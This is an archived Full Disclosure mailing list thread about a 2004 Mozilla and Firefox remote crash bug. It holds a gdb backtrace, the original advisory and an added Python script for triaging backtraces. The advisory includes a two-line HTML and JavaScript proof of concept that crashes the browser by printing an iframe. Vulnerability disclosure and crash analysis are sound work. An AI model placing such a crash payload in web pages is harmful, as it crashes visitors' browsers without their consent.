Full Disclosure mailing list archives

Re: [Advisory] Mozilla Products Remote Crash Vulnerability


From: Kevin Finisterre <kf_lists () secnetops com>
Date: Mon, 06 Dec 2004 14:42:36 -0500

(gdb) c
Continuing.
[New Thread 147461 (LWP 10836)]

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 16384 (LWP 10810)]
0x41111a8b in GlobalWindowImpl::MakeScriptDialogTitle () from /usr/lib/mozilla/components/libgklayout.so
(gdb) bt
#0 0x41111a8b in GlobalWindowImpl::MakeScriptDialogTitle () from /usr/lib/mozilla/components/libgklayout.so
#1  0x40a5e665 in XPTC_InvokeByIndex () from /usr/lib/mozilla/libxpcom.so
#2  0x412cb905 in NSGetModule () from /usr/lib/mozilla/components/libxpconnect.so
#3  0x412d28a5 in NSGetModule () from /usr/lib/mozilla/components/libxpconnect.so
#4  0x4005fde6 in js_Invoke () from /usr/lib/libmozjs.so
#5  0x40069215 in js_Interpret () from /usr/lib/libmozjs.so
#6  0x400604ac in js_Execute () from /usr/lib/libmozjs.so
#7  0x4003b8b4 in JS_EvaluateUCScriptForPrincipals () from /usr/lib/libmozjs.so
#8  0x411068c8 in nsJSContext::EvaluateString () from /usr/lib/mozilla/components/libgklayout.so
#9  0x40fa0020 in nsScriptLoader::EvaluateScript () from /usr/lib/mozilla/components/libgklayout.so
#10 0x40f9fc2e in nsScriptLoader::ProcessRequest () from /usr/lib/mozilla/components/libgklayout.so
#11 0x40f9f7a5 in nsScriptLoader::IsScriptEventHandler () from /usr/lib/mozilla/components/libgklayout.so
#12 0x4101c6e7 in nsHTMLScriptElement::MaybeProcessScript () from /usr/lib/mozilla/components/libgklayout.so
#13 0x4101bc66 in nsHTMLScriptElement::SetDocument () from /usr/lib/mozilla/components/libgklayout.so
#14 0x40f5ac89 in nsGenericElement::AppendChildTo () from /usr/lib/mozilla/components/libgklayout.so
#15 0x41045de4 in HTMLContentSink::ProcessSCRIPTTag () from /usr/lib/mozilla/components/libgklayout.so
#16 0x410431d0 in HTMLContentSink::Init () from /usr/lib/mozilla/components/libgklayout.so
#17 0x4157318f in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#18 0x08a756e8 in ?? ()
#19 0x08d9bd30 in ?? ()
#20 0xbffff1a8 in ?? ()
#21 0x415b1f60 in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#22 0x08c8e9b8 in ?? ()
#23 0x00000000 in ?? ()
#24 0xbffff1a8 in ?? ()
#25 0x41570f8c in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#26 0x08c8e9b8 in ?? ()
#27 0x08d9bd30 in ?? ()
#28 0xbffff1d8 in ?? ()
#29 0x415b1f60 in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#30 0x00000054 in ?? ()
#31 0x00000000 in ?? ()
---Type <return> to continue, or q <return> to quit---
#32 0xbffff1d8 in ?? ()
#33 0x41572a56 in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#34 0x08c8e9b8 in ?? ()
#35 0x08d9bd30 in ?? ()
#36 0xbffff1d8 in ?? ()
#37 0x4156889f in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#38 0x08162600 in ?? ()
#39 0x00000000 in ?? ()
#40 0x08c8e9b8 in ?? ()
#41 0x415b1f60 in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#42 0x00000001 in ?? ()
#43 0x00000001 in ?? ()
#44 0xbffff228 in ?? ()
#45 0x4156f1a5 in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#46 0x08c8e9b8 in ?? ()
#47 0x08d9bd30 in ?? ()
#48 0x00000054 in ?? ()
#49 0x00000001 in ?? ()
#50 0x00000000 in ?? ()
#51 0x08d9bd30 in ?? ()
#52 0x08c8e9b8 in ?? ()
#53 0x4157132e in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#54 0xbffff218 in ?? ()
#55 0x415b2840 in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#56 0x00000001 in ?? ()
#57 0x00000001 in ?? ()
#58 0x00000001 in ?? ()
#59 0x08c8e9b8 in ?? ()
#60 0x00000001 in ?? ()
#61 0x415b1f60 in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#62 0x00000000 in ?? ()
#63 0x00000000 in ?? ()
---Type <return> to continue, or q <return> to quit---
#64 0xbffff268 in ?? ()
#65 0x4156ffcc in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#66 0x08c8e9b8 in ?? ()
#67 0x08972690 in ?? ()
#68 0x00000054 in ?? ()
#69 0x08d9bd30 in ?? ()
#70 0x08972800 in ?? ()
#71 0x00000000 in ?? ()
#72 0x0000000f in ?? ()
#73 0x00000054 in ?? ()
#74 0x08d9bd30 in ?? ()
#75 0x08c8e9b8 in ?? ()
#76 0x00000001 in ?? ()
#77 0x415b1f60 in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#78 0x00000000 in ?? ()
#79 0x08972690 in ?? ()
#80 0xbffff348 in ?? ()
#81 0x4156e357 in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#82 0x08c8e9b8 in ?? ()
#83 0x08972690 in ?? ()
#84 0x00000028 in ?? ()
#85 0x0805d486 in nsSubstring::Assign ()
Previous frame inner to this frame (corrupt stack?)

-KF


Niek van der Maas wrote:
Hi,

I'm posting it here; the Mozilla guys didn't want to answer or even
confirm this bug. No idea whether this one is exploitable or not, I'll
leave that to the readers of these lists.
Bye,

Niek van der Maas
MaasOnline
http://maas-online.nl/


Mozilla Products Remote Crash Vulnerability
===========================================

Vendor        : The Mozilla Organisation
Product(s)    : Navigator, Firefox, other Gecko based products
Version(s)    : All released versions
Platform(s)   : All platforms (confirmed on Windows, Linux and SunOS)
Discovered by : Niek van der Maas, MaasOnline (http://maas-online.nl/)
Advisory URL  : http://maas-online.nl/security/advisory-mozilla-crash.txt


DESCRIPTION
  While working on one of my projects I discovered a vulnerability in Firefox,
  allowing an attacker to crash the browser. Further investigation showed that
  this vulnerability also applies to other Mozilla products, like Navigator.
  All platforms and versions are affected.
  The crash occurs when a one-line JavaScript is executed which tries to print
  an iframe. The crash does not occur when executing this JavaScript in the
  'onload' tag or after clicking a link (i.e., 'onclick').


PROOF OF CONCEPT
  The vulnerability can be exploited with the following 2 lines of code:
    <iframe id="pocframe" name="pocframe" src="about:blank"></iframe>
    <script type="text/javascript">window.frames.pocframe.print();</script>
  A sample page containing these 2 lines is available at
    http://maas-online.nl/security/poc-mozilla-crash.html


PATCH / WORKAROUND
  No patch is available at this time. The only solution is to disable JavaScript
  execution altogether.


VENDOR RESPONSE
  The bug (#272381) was opened 2004-11-30 in Bugzilla.
  Until now (2004-12-06), no response or confirmation has been received. Contacting
  the Mozilla Security Team on IRC didn't help either; it seems that they're
  simply not interested.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


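Reading a backtrace like the one at the top of this thread is a triage step in its own right. As an added example (not code from either post), this Python parser takes a constructed excerpt in the same gdb format, copes with frames that were run together on one line as in the archived post, and summarises the crash site, whether JavaScript execution (js_*) is on the stack, and how far the unwind can be trusted (unresolved frames, gdb's corrupt-stack warning).

```python
import re

# Constructed sample in the format of the gdb backtrace posted above: a few
# frames copied from it, with #2 and #3 run together on one line as in the
# archived post, so the parser has to cope with that.
SAMPLE_BT = """\
#0 0x41111a8b in GlobalWindowImpl::MakeScriptDialogTitle () from /usr/lib/mozilla/components/libgklayout.so
#1  0x40a5e665 in XPTC_InvokeByIndex () from /usr/lib/mozilla/libxpcom.so
#2 0x412cb905 in NSGetModule () from /usr/lib/mozilla/components/libxpconnect.so #3 0x412d28a5 in NSGetModule () from /usr/lib/mozilla/components/libxpconnect.so
#4  0x4005fde6 in js_Invoke () from /usr/lib/libmozjs.so
#5  0x40069215 in js_Interpret () from /usr/lib/libmozjs.so
#17 0x4157318f in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#18 0x08a756e8 in ?? ()
---Type <return> to continue, or q <return> to quit---
#85 0x0805d486 in nsSubstring::Assign ()
Previous frame inner to this frame (corrupt stack?)
"""

# One gdb frame: "#N ADDR in FUNC () [from LIB]". Scanning the whole text with
# finditer, instead of matching line by line, also catches frames that were
# joined onto one line; gdb's pager prompt never matches.
FRAME_RE = re.compile(
    r"#(?P<num>\d+)\s+(?P<addr>0x[0-9a-fA-F]+) in (?P<func>[^\s(]+) \(\)"
    r"(?: from (?P<lib>\S+))?"
)

def parse_backtrace(text):
    """Frames as dicts; 'lib' is the module basename or None for no 'from'."""
    frames = []
    for m in FRAME_RE.finditer(text):
        lib = m.group("lib")
        frames.append({"num": int(m.group("num")),
                       "addr": int(m.group("addr"), 16),
                       "func": m.group("func"),
                       "lib": lib.rsplit("/", 1)[-1] if lib else None,
                       "symbolized": m.group("func") != "??"})
    return frames

def triage(text):
    """What a defender reads off a crash trace: where it died, whether script
    evaluation (js_*) is on the stack, and how trustworthy the unwind is."""
    frames = parse_backtrace(text)
    top = frames[0]
    return {"crash_site": top["func"],
            "crash_module": top["lib"],
            "script_driven": any(f["func"].startswith("js_") for f in frames),
            "unresolved": sum(1 for f in frames if not f["symbolized"]),
            "corrupt_stack": "corrupt stack?" in text}
```

Run `triage(SAMPLE_BT)` on the excerpt and it reports the fault in GlobalWindowImpl::MakeScriptDialogTitle inside libgklayout.so with the JS interpreter on the stack, which is what marks the crash as reachable from page content rather than from a local misconfiguration.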